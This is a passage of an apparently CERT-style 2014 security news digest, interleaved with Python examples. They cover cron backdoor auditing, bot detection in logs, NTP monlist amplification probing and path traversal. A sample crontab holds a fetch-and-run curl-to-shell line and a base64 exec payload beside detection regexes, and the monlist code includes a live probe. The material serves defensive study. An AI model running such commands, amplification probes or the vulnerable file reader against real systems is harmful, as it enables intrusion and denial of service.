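    (r"\b(python|perl|php|ruby)[0-9.]*\s+-[cer]\b", "inline interpreter one-liner"),
    (r"(^|[^A-Za-z0-9_./-])(/tmp|/dev/shm|/var/tmp)/", "runs from a world-writable directory"),
    (r"/\.[A-Za-z0-9_-]+", "hidden (dot) path component"),
    (r"\beval\b", "eval of dynamic content"),
]

# Constructed sample in user-crontab format (no user field), so the block runs offline.
SAMPLE_USER_CRONTAB = """\
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
* * * * * /tmp/.x/update.sh >/dev/null 2>&1
*/5 * * * * curl -s http://203.0.113.10/s.txt | sh
@hourly echo aGVsbG8= | base64 -d | python -c "import sys;exec(sys.stdin.read())"
"""


def parse_cron_lines(text, system_format=False):
    """Return [(schedule, command)] per entry. system_format=True is for
    /etc/crontab and /etc/cron.d/*, which carry a user field after the schedule."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:                      # VAR=value assignment, not a job
            continue
        nfields = 1 if first.startswith("@") else 5
        if system_format:
            nfields += 1
        parts = line.split(None, nfields)
        if len(parts) <= nfields:             # schedule without a command
            continue
        entries.append((" ".join(parts[:nfields]), parts[nfields]))
    return entries


def audit_entries(entries):
    """Return [(schedule, command, [reasons])] for entries matching any indicator."""
    findings = []
    for schedule, cmd in entries:
        reasons = [why for pat, why in INDICATORS if re.search(pat, cmd)]
        if schedule.startswith("* * * * *"):
            reasons.append("runs every minute (typical of backdoor re-creation loops)")
        if reasons:
            findings.append((schedule, cmd, reasons))
    return findings


def audit_host():
    """Audit the usual cron locations on the local host (root is needed to read spools)."""
    sources = [(p, True) for p in ["/etc/crontab"] + glob.glob("/etc/cron.d/*")]
    sources += [(p, False) for p in glob.glob("/var/spool/cron/crontabs/*") + glob.glob("/var/spool/cron/*")]
    results = {}
    for path, system_format in sources:
        try:
            with open(path) as f:
                text = f.read()
        except OSError:
            continue                          # missing, unreadable, or a directory
        findings = audit_entries(parse_cron_lines(text, system_format))
        if findings:
            results[path] = findings
    return results


if __name__ == "__main__":
    for schedule, cmd, reasons in audit_entries(parse_cron_lines(SAMPLE_USER_CRONTAB)):
        print(f"[{schedule}] {cmd}\n    -> {'; '.join(reasons)}")
```

Run without arguments it audits the embedded sample; call audit_host() as root to walk the real cron files. A hit is a lead, not a verdict: the hidden-path and world-writable-directory rules in particular will also catch sloppy but legitimate jobs, which is why the output carries the matched reasons rather than a yes/no.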
*** DynDNS service buckles under DDoS attack ***
---------------------------------------------
Dyn, operator of one of the best-known DynDNS services, has become the target of a DDoS attack. Only part of the provider's DNS infrastructure is affected, but the disruption is nevertheless felt by users.
---------------------------------------------
http://www.heise.de/newsticker/meldung/DynDNS-Dienst-knickt-unter-DDoS-Atta…
*** Dutch authorities warn about webcams ***
---------------------------------------------
The Dutch judicial authorities warn that the webcams built into tablets and laptops constitute a security hole through which hackers can intrude. Covering them with tape is recommended.
---------------------------------------------
http://www.heise.de/security/meldung/Niederlaendische-Behoerden-warnen-vor-…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 14-01-2014 18:00 − Wednesday 15-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Verfassungsschutz: danger of online industrial espionage still underestimated ***
---------------------------------------------
Many small and medium-sized enterprises still do not regard spending on IT security as money well invested, said the president of the Federal Office for the Protection of the Constitution (Bundesamt für Verfassungsschutz).
---------------------------------------------
http://www.heise.de/security/meldung/Verfassungsschutz-Gefahr-der-Online-Wi…
*** NSA also taps computers without an Internet connection ***
---------------------------------------------
The NSA has installed spyware on around 100,000 computers worldwide. The US intelligence agency has also gained access to computers without an Internet connection.
---------------------------------------------
http://futurezone.at/netzpolitik/nsa-zapft-auch-computer-ohne-internetverbi…
*** A Look Into the Future and the January 2014 Bulletin Release ***
---------------------------------------------
In January, there are those who like to make predictions about the upcoming year. I am not one of those people. Instead, I like to quote Niels Bohr who said, "Prediction is very difficult, especially if it's about the future." However, I can say without a doubt that change is afoot in 2014. In February, usage of the MD5 hash algorithm in certificates will be restricted, as first discussed in Security Advisory 2862973, and the update goes out through Microsoft Update on the...
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2014/01/14/a-look-into-the-future-a…
*** Critical and important patches from Adobe and Microsoft ***
---------------------------------------------
Good things come to those who wait: on its Patch Tuesday Microsoft has, among other things, closed the privilege escalation hole in Windows that has been abused for attacks since at least November. Adobe has urgent updates for Acrobat and Reader.
---------------------------------------------
http://www.heise.de/security/meldung/Kritische-und-wichtige-Patches-von-Ado…
*** Oracle closes 144 security holes ***
---------------------------------------------
The update also affects Java 7 and Java 5
---------------------------------------------
http://derstandard.at/1388651059299
*** Adobe Security Bulletins Posted ***
---------------------------------------------
Today, we released the following Security Bulletins:
APSB14-01 – Security updates available for Adobe Reader and Acrobat
APSB14-02 – Security updates available for Adobe Flash Player
Customers of the affected products should consult the relevant Security Bulletin(s) for details.
---------------------------------------------
http://blogs.adobe.com/psirt/?p=1041
*** Oracle Critical Patch Update Advisory - January 2014 ***
---------------------------------------------
Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible. This Critical Patch Update contains 144 new security fixes across the product families listed below.
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
*** Summary for January 2014 - Version: 1.0 ***
---------------------------------------------
This bulletin summary lists security bulletins released for January 2014.
With the release of the security bulletins for January 2014, this bulletin summary replaces the bulletin advance notification originally issued January 9, 2014. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification.
---------------------------------------------
http://technet.microsoft.com/en-ca/security/bulletin/ms14-jan
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 13-01-2014 18:00 − Tuesday 14-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** HPSBUX02960 SSRT101419 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS) ***
---------------------------------------------
A potential security vulnerability has been identified with HP-UX running NTP. The vulnerability could be exploited remotely to create a Denial of Service (DoS).
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** Security: a mathematical formula for cyberwar ***
---------------------------------------------
Two scientists from the USA have developed a formula with which they can calculate the best time to carry out a cyberattack on a given target with given means.
---------------------------------------------
http://www.golem.de/news/security-mathematische-formel-fuer-den-cyberwar-14…
*** Router backdoor: Cisco, Netgear and Linksys promise protection ***
---------------------------------------------
Cisco does not plan to deliver an update that removes the backdoor found in some devices until the end of January; Netgear and Linksys have not yet named a date. Support requests show that the backdoor has been active for at least 10 years.
---------------------------------------------
http://www.heise.de/security/meldung/Router-Backdoor-Cisco-Netgear-und-Link…
*** Spamming and scanning botnets - is there something I can do to block them from my site?, (Tue, Jan 14th) ***
---------------------------------------------
Spamming and scanning botnets - is there something I can do to block them from my site? This question keeps popping up on forums and in all the places popular with those beleaguered souls despairing at the random spamming and overfilled logs from scanning. Although this isn't a magic-ball question, the answer does come out as: maybe, maybe not. The reason behind the ambiguity is logical, to a degree; it's easy trying to hinder, frustrate and reduce the effectiveness of automated botnet processes,
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17426&rss
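One concrete form of the "maybe" above, as an added example that is not from the ISC diary: score each client in a web server's combined-format access log by the traits scanners and spambots leave behind (a high 404 ratio across many probed paths, repeated POSTs to login endpoints, no User-Agent at all) and emit block rules for the offenders. The log lines, thresholds and login-path list are constructed for illustration; real thresholds need tuning against your own traffic, and this is the batch version of what a tool like fail2ban does continuously.

```python
"""Flag scanning/spamming clients from access-log traits (added example)."""
import re
from collections import defaultdict

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php", "/administrator/index.php")

# Constructed sample: one browsing user, one directory scanner, one login brute-forcer.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Jan/2014:10:00:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.7 - - [14/Jan/2014:10:00:02 +0000] "GET /about.html HTTP/1.1" 200 2210 "http://example.test/" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.42 - - [14/Jan/2014:10:00:03 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 169 "-" "-"
203.0.113.42 - - [14/Jan/2014:10:00:03 +0000] "GET /pma/ HTTP/1.1" 404 169 "-" "-"
203.0.113.42 - - [14/Jan/2014:10:00:03 +0000] "GET /myadmin/ HTTP/1.1" 404 169 "-" "-"
203.0.113.42 - - [14/Jan/2014:10:00:04 +0000] "GET /wp-content/themes/x/timthumb.php HTTP/1.1" 404 169 "-" "-"
203.0.113.42 - - [14/Jan/2014:10:00:04 +0000] "GET /xmlrpc.php HTTP/1.1" 404 169 "-" "-"
203.0.113.42 - - [14/Jan/2014:10:00:04 +0000] "GET /admin/ HTTP/1.1" 404 169 "-" "-"
192.0.2.9 - - [14/Jan/2014:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "python-requests/2.2.0"
192.0.2.9 - - [14/Jan/2014:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "python-requests/2.2.0"
192.0.2.9 - - [14/Jan/2014:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "python-requests/2.2.0"
192.0.2.9 - - [14/Jan/2014:10:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "python-requests/2.2.0"
192.0.2.9 - - [14/Jan/2014:10:00:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.2.0"
"""


def parse_log(lines):
    """Yield one dict per line that matches the combined format; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def score_clients(lines, min_requests=5, notfound_ratio=0.8, login_attempts=4, min_no_ua=3):
    """Return {ip: [reasons]} for clients whose traffic looks automated."""
    stats = defaultdict(lambda: {"n": 0, "nf": 0, "logins": 0, "no_ua": 0, "paths": set()})
    for rec in parse_log(lines):
        s = stats[rec["ip"]]
        s["n"] += 1
        s["paths"].add(rec["path"])
        if rec["status"] == "404":
            s["nf"] += 1
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0] in LOGIN_PATHS:
            s["logins"] += 1
        if rec["ua"] in (None, "", "-"):
            s["no_ua"] += 1
    verdicts = {}
    for ip, s in stats.items():
        reasons = []
        if s["n"] >= min_requests and s["nf"] / s["n"] >= notfound_ratio:
            reasons.append(f"{s['nf']}/{s['n']} requests were 404s across {len(s['paths'])} paths")
        if s["logins"] >= login_attempts:
            reasons.append(f"{s['logins']} POSTs to login endpoints")
        if s["no_ua"] >= min_no_ua:
            reasons.append("no User-Agent sent")
        if reasons:
            verdicts[ip] = reasons
    return verdicts


def deny_rules(verdicts, style="nginx"):
    """Render block rules: 'nginx' gives deny directives, anything else iptables DROP rules."""
    rules = []
    for ip, reasons in sorted(verdicts.items()):
        note = "; ".join(reasons)
        if style == "nginx":
            rules.append(f"deny {ip};  # {note}")
        else:
            rules.append(f"iptables -I INPUT -s {ip} -p tcp --dport 80 -j DROP  # {note}")
    return rules


if __name__ == "__main__":
    print("\n".join(deny_rules(score_clients(SAMPLE_LOG.splitlines()))))
```

Blocking by source address is exactly the "maybe, maybe not" of the diary: it raises the cost for one bot node and does nothing about the next one, so pair it with expiry (drop the rule after a day) rather than letting the deny list grow forever.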
*** ISC BIND NSEC3-Signed Zones Queries Handling Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability has been reported in ISC BIND, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when handling queries for NSEC3-signed zones and can be exploited to cause a crash with an "INSIST" failure by sending a specially crafted query.
Successful exploitation requires an authoritative nameserver serving at least one NSEC3-signed zone.
---------------------------------------------
https://secunia.com/advisories/56427
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 10-01-2014 18:00 − Monday 13-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Robert Waldner
*** Factsheet published: Certificates with 1024 bit RSA are being phased-out ***
---------------------------------------------
Does your organisation still use certificates with an RSA key length of at most 1024 bits? The NCSC recommends replacing them. The factsheet "Certificates with 1024 bit RSA are being phased-out" provides more information and perspectives for action.
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/factsheet-published-certifi…
*** Symantec Endpoint Protection multiple vulnerabilities ***
---------------------------------------------
Symantec Endpoint Protection authentication privilege escalation
http://xforce.iss.net/xforce/xfdb/90224
Symantec Endpoint Protection search paths privilege escalation
http://xforce.iss.net/xforce/xfdb/90226
Symantec Endpoint Protection custom policies security bypass
http://xforce.iss.net/xforce/xfdb/90225
*** Juniper Junos multiple vulnerabilities ***
---------------------------------------------
Juniper Junos CLI Commands Let Local Users Gain Elevated Privileges
http://www.securitytracker.com/id/1029585
Juniper Junos Branch SRX Series HTTP Processing Flaw Lets Remote Users Deny Service
http://www.securitytracker.com/id/1029584
Juniper Junos Branch SRX Series IP Processing Flaw Lets Remote Users Deny Service
http://www.securitytracker.com/id/1029583
Juniper Junos BGP Update Processing Flaw Lets Remote Users Deny Service
http://www.securitytracker.com/id/1029582
Juniper Junos XNM Command Processor Lets Remote Users Consume Excessive Memory on the Target System
http://www.securitytracker.com/id/1029586
*** The thousand plugged holes of FFmpeg ***
---------------------------------------------
Two years ago, two Google engineers began an automated hunt for bugs in the free multimedia framework FFmpeg; more than 1120 of them have since been fixed.
---------------------------------------------
http://www.heise.de/security/meldung/Die-tausend-gestopften-Loecher-des-FFm…
*** Microsoft Twitter accounts, blog hijacked by SEA ***
---------------------------------------------
Another week, ANOTHER security own goal for Redmond. Microsoft had two Twitter accounts and an official blog compromised over the weekend in another embarrassing security incident for the Redmond giant.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/01/13/microsoft_t…
*** Trends in Targeted Attacks: 2013 ***
---------------------------------------------
FireEye has been busy over the last year. We have tracked malware-based espionage campaigns and published research papers on numerous advanced threat actors. We chopped through Poison Ivy, documented a cyber arms dealer, and revealed that Operation Ke3chang had targeted
---------------------------------------------
http://www.fireeye.com/blog/technical/malware-research/2014/01/trends-in-ta…
*** Cisco confirms backdoor in several routers ***
---------------------------------------------
Test interface allows access to sensitive data; an update is due to follow in January
---------------------------------------------
http://derstandard.at/1388650811096
*** Report: British intelligence agency GCHQ weakened GSM encryption ***
---------------------------------------------
Until now it was reported that NATO had insisted on a weak A5/1 algorithm in the 1980s. Now a Norwegian scientist assigns the responsibility to the British.
---------------------------------------------
http://www.heise.de/security/meldung/Bericht-Britischer-Geheimdienst-GCHQ-s…
*** Supply of virus signatures for Windows XP machines secured for now ***
---------------------------------------------
On 8 April Microsoft drops support for Windows XP, but that does not impress the antivirus vendors. The consequence: XP users need not worry about signature updates for the time being, as long as their virus scanner does not come from Microsoft.
---------------------------------------------
http://www.heise.de/security/meldung/Versorgung-mit-Virensignaturen-fuer-Wi…
*** LKA NRW warns of fraud attempts by alleged Microsoft employees ***
---------------------------------------------
In recent weeks there has been an increase in cases in which alleged Microsoft support staff try to defraud PC users by telephone.
---------------------------------------------
http://www.heise.de/security/meldung/LKA-NRW-warnt-vor-Betrugsversuchen-ang…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 09-01-2014 18:00 − Friday 10-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Understanding and mitigating NTP-based DDoS attacks ***
---------------------------------------------
Over the last couple of weeks you may have been hearing about a new tool in the DDoS arsenal: NTP-based attacks. These have become popular recently and caused trouble for some gaming web sites and service providers. We'd long thought that NTP might become a vector for DDoS attacks because, like DNS, it is a simple UDP-based protocol that can be persuaded to return a large reply to a small request. Unfortunately, that prediction has come true.
---------------------------------------------
http://blog.cloudflare.com/understanding-and-mitigating-ntp-based-ddos-atta…
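The "large reply to a small request" above is the mode 7 MON_GETLIST_1 ("monlist") query, which returns the server's list of recent clients. The following is an added example, not Cloudflare's code: the 8-byte request form used by common scanners, a parser for the replies (layout per ntpd's ntp_request.h, six 72-byte entries per 440-byte packet, with a "more" bit chaining up to 100 packets), and the amplification arithmetic. build_monlist_reply() only fabricates sample replies so the block runs offline; probe() sends the real query and must only be run against servers you are authorized to test.

```python
"""NTP mode 7 monlist: request, reply parser, amplification (added example)."""
import socket
import struct

# Minimal MON_GETLIST_1 request as sent by common scanners:
# 0x17 = version 2 | mode 7 (private), 0x00 = no auth / seq 0,
# 0x03 = implementation XNTPD, 0x2A = request code 42 (MON_GETLIST_1),
# then err/nitems and mbz/itemsize, both zero in a request.
MONLIST_REQUEST = bytes([0x17, 0x00, 0x03, 0x2A]) + b"\x00" * 4
ITEM_SIZE = 72          # sizeof(struct info_monitor_1)
MAX_ITEMS = 6           # entries ntpd fits into one reply packet at this item size


def parse_monlist_reply(data):
    """Return (more, [(client_ip, count), ...]) for one mode 7 response packet."""
    if len(data) < 8:
        raise ValueError("short packet")
    rm_vn_mode, _auth_seq, _impl, req, err_nitems, mbz_size = struct.unpack("!BBBBHH", data[:8])
    if not rm_vn_mode & 0x80 or rm_vn_mode & 0x07 != 7 or req != 0x2A:
        raise ValueError("not a mode 7 MON_GETLIST_1 response")
    if err_nitems >> 12:                       # error code in the top 4 bits
        return False, []                       # e.g. monlist refused (noquery) or unsupported
    nitems, size = err_nitems & 0x0FFF, mbz_size & 0x0FFF
    items = []
    for i in range(nitems):
        item = data[8 + i * size: 8 + (i + 1) * size]
        # info_monitor_1: lasttime(4) firsttime(4) restr(4) count(4) addr(4) daddr(4) ...
        count = struct.unpack("!I", item[12:16])[0]
        items.append((socket.inet_ntoa(item[16:20]), count))
    return bool(rm_vn_mode & 0x40), items      # 0x40 = "more packets follow"


def build_monlist_reply(entries, more=False):
    """Fabricate a response packet (used here only to produce sample data offline)."""
    flags = 0x80 | (2 << 3) | 7 | (0x40 if more else 0)
    pkt = struct.pack("!BBBBHH", flags, 0, 3, 0x2A, len(entries) & 0x0FFF, ITEM_SIZE)
    for ip, count in entries:
        pkt += struct.pack("!IIII", 0, 0, 0, count)                  # lasttime, firsttime, restr, count
        pkt += socket.inet_aton(ip) + socket.inet_aton("0.0.0.0")    # addr, daddr
        pkt += struct.pack("!IHBB", 0, 123, 3, 4)                    # flags, port, mode, version
        pkt += b"\x00" * (ITEM_SIZE - 32)                            # v6_flag, unused, addr6, daddr6
    return pkt


def amplification(request, replies):
    """Bytes returned per byte sent, at the UDP payload level."""
    return sum(len(r) for r in replies) / len(request)


def probe(host, timeout=2.0):
    """Send one monlist query and collect the reply packets (authorized testing only)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    s.sendto(MONLIST_REQUEST, (host, 123))
    replies = []
    try:
        while True:
            data, _ = s.recvfrom(2048)
            replies.append(data)
            if not parse_monlist_reply(data)[0]:
                break
    except socket.timeout:
        pass
    finally:
        s.close()
    return replies


if __name__ == "__main__":
    # A server with 600 recent clients answers one 8-byte query with 100 packets of 440 bytes.
    sample = [build_monlist_reply([("192.0.2.%d" % (i + 1), 10) for i in range(MAX_ITEMS)],
                                  more=k < 99) for k in range(100)]
    print("first packet:", parse_monlist_reply(sample[0])[1][:2])
    print("amplification: %.0fx" % amplification(MONLIST_REQUEST, sample))
```

The figure of roughly 200x usually quoted for monlist is measured on the wire, with IP/UDP/Ethernet headers and the full-size request that ntpdc itself sends; at the payload level with the 8-byte form the ratio is higher still, which is the whole point. The fix on the server side is the one the post recommends: `restrict default noquery` in ntp.conf (or an ntpd release that no longer implements monlist), after which the reply is a short error packet rather than the client list.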
*** Advance Notification for January 2014 - Version: 1.0 ***
---------------------------------------------
This is an advance notification of security bulletins that Microsoft is intending to release on January 14, 2014.
This bulletin advance notification will be replaced with the January bulletin summary on January 14, 2014. For more information about the bulletin advance notification service, see...
---------------------------------------------
http://technet.microsoft.com/en-us/security/bulletin/ms14-jan
*** Oracle Critical Patch Update Pre-Release Announcement - January 2014 ***
---------------------------------------------
This Critical Patch Update Pre-Release Announcement provides advance information about the Oracle Critical Patch Update for January 2014, which will be released on Tuesday, January 14, 2014. While this Pre-Release Announcement is as accurate as possible at the time of publication, the information it contains may change before publication of the Critical Patch Update Advisory.
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
*** Prenotification Security Advisory for Adobe Reader and Acrobat ***
---------------------------------------------
Adobe is planning to release security updates on Tuesday, January 14, 2014 for Adobe Reader and Acrobat XI (11.0.05) and earlier versions for Windows and Macintosh.
---------------------------------------------
http://helpx.adobe.com/security/products/reader/apsb14-01.html
*** Adobe, Microsoft and Oracle celebrate the first Patch Day of the year ***
---------------------------------------------
Next Tuesday it is that time again. Adobe intends to close critical holes in Acrobat and Adobe Reader; Microsoft, among other things, a Windows hole that has been exploited since November of last year.
---------------------------------------------
http://www.heise.de/security/meldung/Adobe-Microsoft-und-Oracle-zelebrieren…
*** Tackling the Sefnit botnet Tor hazard ***
---------------------------------------------
Sefnit, a prevailing malware known for using infected computers for click fraud and bitcoin mining, has left millions of machines potentially vulnerable to future attacks. We recently blogged about Sefnit performing click fraud and how we added detection on the upstream Sefnit installer. In this blog we explain how the Tor client service, added by Sefnit, is posing a risk to millions of machines, and how we are working to address the problem. Win32/Sefnit made headlines last August as it took...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botn…
*** Once again hundreds of thousands of customer records stolen through xt:Commerce hole ***
---------------------------------------------
A further security hole in xt:Commerce 3 and some of its successors is currently being exploited to steal names, e-mail addresses and password hashes from online shops. More than 230,000 customers, mainly from Germany and Austria, are affected.
---------------------------------------------
http://www.heise.de/security/meldung/Schon-wieder-hunderttausende-Kundendat…
*** Cisco Context Directory Agent Multiple Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been reported in Cisco Context Directory Agent, which can be exploited by malicious users to bypass certain security restrictions and by malicious people to conduct cross-site scripting attacks and manipulate certain data.
---------------------------------------------
https://secunia.com/advisories/56365
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 08-01-2014 18:00 − Thursday 09-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Intercepted Email Attempts to Steal Payments, (Wed, Jan 8th) ***
---------------------------------------------
A reader sent in details of an incident that is currently being investigated in their environment. (Thank you Peter for sharing!) It appears to be a slick yet elaborate scam to divert a customer payment to the scammers. It occurs when the scammer attempts to slip into an email conversation and go undetected in order to channel an ordinary payment for service or goods into his own coffers. Here is a simple breakdown of the flow: Supplier sends business email to customer, email mentions a...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17366&rss
*** ZeroAccess Takedown and the TDSS Aftermath ***
---------------------------------------------
Early December last year, Microsoft - in cooperation with certain law enforcement agencies - announced their takedown of the ZeroAccess operations. This development, however, also yielded an unexpected effect on another well-known botnet, in particular TDSS. TDSS and ZeroAccess ZeroAccess is one of the most notable botnets in the world, with its malware known for rootkit...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/v07x5pzmpj4/
*** Malvertising attacks via Yahoo ads may precede broader iframe attacks ***
---------------------------------------------
A New Year's malvertising attack on Yahoo.com that is believed to have infected the systems and devices of thousands of website visitors could signal an uptick in the use of highly effective iframe Web attacks on larger online communities.
---------------------------------------------
http://searchsecurity.techtarget.com/news/2240212218/Malvertising-attacks-v…
*** Personal banking apps leak info through phone ***
---------------------------------------------
For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results.
---------------------------------------------
http://blog.ioactive.com/2014/01/personal-banking-apps-leak-info-through.ht…
*** False alarm: Avast for Android thinks all apps are viruses ***
---------------------------------------------
A faulty signature update caused Avast's Android virus scanner to produce numerous hits this Thursday.
---------------------------------------------
http://www.heise.de/security/meldung/Falscher-Alarm-Avast-fuer-Android-hael…
*** WordPress attackers love TimThumb ***
---------------------------------------------
Akamai has analysed attacks on WordPress extensions and found that the attackers have zeroed in on one plug-in in particular.
---------------------------------------------
http://www.heise.de/security/meldung/WordPress-Angreifer-lieben-TimThumb-20…
*** Critics Cut Deep on Yahoo Mail Encryption Rollout ***
---------------------------------------------
Yahoo has turned on HTTPS by default for its web-based email service, but the deployment is inconsistent across the board and experts are critical of its use of weak standards and the lack of Perfect Forward Secrecy and HSTS.
---------------------------------------------
http://threatpost.com/critics-cut-deep-on-yahoo-mail-encryption-rollout/103…
*** Drupal Media 7.x Access Bypass ***
---------------------------------------------
Topic: Drupal Media 7.x Access Bypass
Risk: High
View online: https://drupal.org/node/2169767
* Advisory ID: PSA-2014-001
* Project: Media [1] (third-party module)
...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014010051
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 07-01-2014 18:00 − Wednesday 08-01-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** 64-bit ZBOT Leverages Tor, Improves Evasion Techniques ***
---------------------------------------------
Reports have surfaced that ZeuS/ZBOT, the notorious online banking malware, is now targeting 64-bit systems. During our own investigation, we have confirmed that several ZBOT 32-bit samples (detected as TSPY_ZBOT.AAMV) do have an embedded 64-bit version (detected as TSPY64_ZBOT.AANP). However, our investigation also led us to confirm other noteworthy routines of the malware, including its...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/RjjdkzMleq4/
*** Malicious Ads on DailyMotion Redirect to Fake AV Attack ***
---------------------------------------------
Popular video-sharing site DailyMotion is serving malicious ads that redirect site visitors to domains hosting Fake AV malware, security firm Invincea reports.
---------------------------------------------
http://threatpost.com/malicious-ads-on-dailymotion-redirect-to-fake-av-atta…
*** Break-in at the Opensuse forums ***
---------------------------------------------
The public Opensuse forums have fallen victim to an attack and are currently switched off.
---------------------------------------------
http://www.heise.de/security/meldung/Einbruch-in-die-Opensuse-Foren-2078128…
*** Yahoo Mail: encryption finally becomes the default ***
---------------------------------------------
All communication with the webmail service is now secured via HTTPS, but without Perfect Forward Secrecy
---------------------------------------------
http://derstandard.at/1388650341295
*** Satellite Links for Remote Networks May Pose Soft Target for Attackers ***
---------------------------------------------
Land-based terminals that send data to satellites may pose a soft target for hackers, an analysis from a computer security firm shows. VSATs, an abbreviation for "very small aperture terminals," supply Internet access to remote locations, enabling companies to transmit data from an isolated network to an organization's main one. The devices are used in a variety of industries, including energy, financial services and defense.
---------------------------------------------
http://www.cio.com/article/745580/Satellite_Links_for_Remote_Networks_May_P…
*** Linux Kernel, Font Bugs Fixed in Ubuntu ***
---------------------------------------------
A huge number of security vulnerabilities have been fixed in Ubuntu, including a remotely exploitable font flaw that an attacker could use to run arbitrary code on vulnerable machines. A number of Linux kernel flaws also were patched in some versions of the operating system. The font vulnerability affects five different versions of Ubuntu, including...
---------------------------------------------
http://threatpost.com/linux-kernel-font-bugs-fixed-in-ubuntu/103500
*** VU#487078: QNAP QTS path traversal vulnerability ***
---------------------------------------------
Vulnerability Note VU#487078: QNAP QTS path traversal vulnerability
Original release date: 08 Jan 2014 | Last revised: 08 Jan 2014
Overview: QNAP QTS 4.0.3 and possibly earlier versions contain a path traversal vulnerability.
Description: CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) - CVE-2013-7174
QNAP QTS is a Network-Attached Storage (NAS) system accessible via a web interface. QNAP QTS 4.0.3 and possibly earlier versions contain a path traversal...
---------------------------------------------
http://www.kb.cert.org/vuls/id/487078
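The CWE-22 pattern named in the note above, as an added example that is not QNAP's code (the note gives no detail of the QTS bug itself, so this is the generic shape): a naive file-serving helper that joins the requested name onto a base directory, beside a hardened version that decodes the request once, rejects absolute paths and checks that the resolved real path is still inside the base. The directory tree is constructed in a temporary directory so the block runs offline.

```python
"""CWE-22 path traversal: vulnerable vs hardened file access (added example)."""
import os
import tempfile
from urllib.parse import unquote


def serve_file_vulnerable(base_dir, requested):
    """Naive join: '../' walks out of base_dir, and an absolute path replaces it entirely."""
    return open(os.path.join(base_dir, requested), "rb").read()


def resolve_safely(base_dir, requested):
    """Return the real path of `requested` inside base_dir, or raise PermissionError.
    Symlinks are resolved before the check, so a link pointing outside is rejected too."""
    if os.path.isabs(requested):
        raise PermissionError(f"absolute path rejected: {requested!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath collapses 'sub/../x' and is not fooled by a 'base_dir_evil' prefix
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"{requested!r} escapes {base_dir}")
    return candidate


def read_safely(base_dir, raw_request):
    """Decode the URL form exactly once, then check the decoded value.
    Decoding again after the check is the classic double-decoding bypass."""
    return open(resolve_safely(base_dir, unquote(raw_request)), "rb").read()


def is_rejected(base_dir, raw_request):
    """True if the hardened resolver refuses the request."""
    try:
        resolve_safely(base_dir, unquote(raw_request))
        return False
    except PermissionError:
        return True


def make_demo_tree():
    """Constructed fixture: <root>/public/index.html is served, <root>/secret.txt is not."""
    root = tempfile.mkdtemp(prefix="cwe22-")
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "index.html"), "w") as f:
        f.write("<h1>hello</h1>\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("TOP SECRET\n")
    return root, public


if __name__ == "__main__":
    root, public = make_demo_tree()
    print("vulnerable:", serve_file_vulnerable(public, "../secret.txt"))
    for req in ("index.html", "../secret.txt", "%2e%2e%2fsecret.txt", "/etc/passwd"):
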